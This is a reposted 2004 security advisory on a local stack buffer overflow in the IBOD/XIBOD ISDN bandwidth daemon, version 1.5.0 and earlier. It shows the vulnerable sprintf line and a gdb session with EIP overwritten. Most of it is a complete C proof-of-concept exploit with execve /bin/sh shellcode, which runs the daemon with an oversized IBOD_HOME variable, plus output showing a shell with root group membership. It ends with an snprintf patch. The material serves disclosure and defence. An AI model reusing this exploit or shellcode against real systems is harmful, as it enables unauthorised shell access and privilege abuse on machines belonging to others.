Copy Link
Add to Bookmark
Report

10 - IBOD/XIBOD 1.5.0 and prior Local Buffer Overflow Vulnerability

eZine's profile picture
Published in 
Advisory
 · 2 years ago

No System Group - Advisory #10 - 19/12/04

  • Program: IBOD/XIBOD ISDN Bandwidth On Demand Daemon
  • Homepage: http://www.datenwelt.net/oss/ibod/
  • Vulnerable Versions: IBOD/XIBOD 1.5.0 and prior
  • Risk: Low
  • Impact: Local Stack Buffer Overflow Vulnerability

DESCRIPTION

Ibod is a daemon program for GNU/Linux that constantly monitors the ISDN interface for inbound and outbound traffic throughput. It was originally written by Björn Smith at Compound Systems AB.

More informations at: http://www.datenwelt.net/oss/ibod/

DETAILS

Ibod is affected by a buffer overflow bug in setattr() function when is stored in the 'config_filename' variable more than 512 bytes:

--- ibod.c --- 
050: channels_last = -1;
051:
052: /* Find out where to look for configuration file */
053: if ((home = getenv("IBOD_HOME")) == NULL) // <--- check this
054: home = IBOD_DEFAULT_DIR;
055:
056: /* Setup initial attributes */
057: if (setattr(home) == -1) {
058: closelog();
059: exit(1);
060: }

...

206: /* Open config file */
207: sprintf(config_filename, "%s/ibod.cf", home); // <--- the bug
208: if ((fd = fopen(config_filename, "r")) == NULL) {
209:
210: syslog(LOG_ERR, "%s: %s\n", config_filename, strerror(errno));
211: return -1;
212: }
213:
214: /* Loop over the config file to setup attributes */
215: while (fgets(linebuf, MAX_STR_LEN, fd) != NULL) {
216:
217: if (*linebuf == '#') /* Ignore comments */
218: continue;
--- ibod.c ---

We now will see what happened...

coki@nosystem:~/audit$ export IBOD_HOME=`perl -e 'print "A" x 544'` 
coki@nosystem:~/audit$ ibod
Segmentation fault
coki@nosystem:~/audit$

When is stored more than 512 bytes in IBOD_HOME,
the buffer 'config_filename' is overflowed.
We now will see what happen with 'gdb'.

coki@nosystem:~/audit$ gdb ibod
GNU gdb 6.1.1
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/libthread_db.so.1".

(gdb) r
Starting program: /home/coki/audit/ibod

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r $eip
eip 0x41414141 0x41414141
(gdb) q
The program is running. Exit anyway? (y or n) y
coki@nosystem:~/audit$

We can see that the EIP is overwritten with 0x41414141.

EXPLOIT

------------------ ibod_bof.c ------------------- 
/* ibod_bof.c
*
* IBOD <= 1.5.0 local buffer overflow exploit (Proof of Concept)
*
* Tested in Slackware Linux 10.0
*
* by CoKi <coki@nosystem.com.ar>
* No System Group - http://www.nosystem.com.ar
*/


#include <stdio.h>
#include <strings.h>

#define BUFFER 540 + 4

char shellcode[]=
"\x31\xc0" /* xor %eax,%eax */
"\x31\xd2" /* xor %edx,%edx */
"\x52" /* push %edx */
"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x52" /* push %edx */
"\x53" /* push %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\xb0\x0b" /* mov $0xb,%al */
"\xcd\x80"; /* int $0x80 */

void use(char *program);

int main(int argc, char *argv[]) {

FILE *file;
char buf[BUFFER], *path, tmp[BUFFER];
char *buffer=buf;
int ret;

if(argc != 2) use(argv[0]);

path = argv[1];

if((file = fopen(path, "r")) == NULL) {
printf(" Failed to open file!\n");
exit(1);
}

ret = 0xbffffffa - strlen(shellcode) - strlen(path);

bzero(buf, sizeof(buf));
memset(buffer, 'A', BUFFER-4);

sprintf(tmp, "%s", &ret);
strncat(buf, tmp, 4);

printf("\n ibod <= 1.5.0 local stack buffer overflow (Proof of Concept)\n");
printf(" by CoKi <coki@nosystem.com.ar>\n\n");

setenv("IBOD_HOME", buf, 1);
setenv("SHELLCODE", shellcode, 1);

execl(path, path, NULL);

}

void use(char *program) {
printf(" Use: %s <path>\n", program);
exit(1);
}

---------------- ibod_bof.c ------------------

coki@nosystem:~/audit$ make ibod_bof
cc ibod_bof.c -o ibod_bof
coki@nosystem:~/audit$ ./ibod_bof /home/coki/audit/ibod

ibod <= 1.5.0 local stack buffer overflow (Proof of Concept)
by CoKi <coki@nosystem.com.ar>

sh-2.05b$ id
uid=1000(coki) gid=0(root) groups=0(root),11(floppy),17(audio),18(video),19(cdrom)
sh-2.05b$

This exploit does not give a root shell :(

SOLUTIONS

The patch is included here:

--- ibod.c      2001-02-15 07:31:37.000000000 -0300 
+++ ibod.c 2004-12-20 20:56:40.000000000 -0300
@@ -204,7 +204,7 @@ static int setattr(char *home)
cf.max_channels = MAX_CHANNELS;

/* Open config file */
- sprintf(config_filename, "%s/ibod.cf", home);
+ snprintf(config_filename, sizeof(config_filename), "%s/ibod.cf", home);
if ((fd = fopen(config_filename, "r")) == NULL) {
syslog(LOG_ERR, "%s: %s\n", config_filename, strerror(errno));
return -1;

REFERENCES

http://www.nosystem.com.ar/advisories/advisory-10.txt

CREDITS

Discovered by CoKi <coki@nosystem.com.ar>

No System Group - http://www.nosystem.com.ar

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT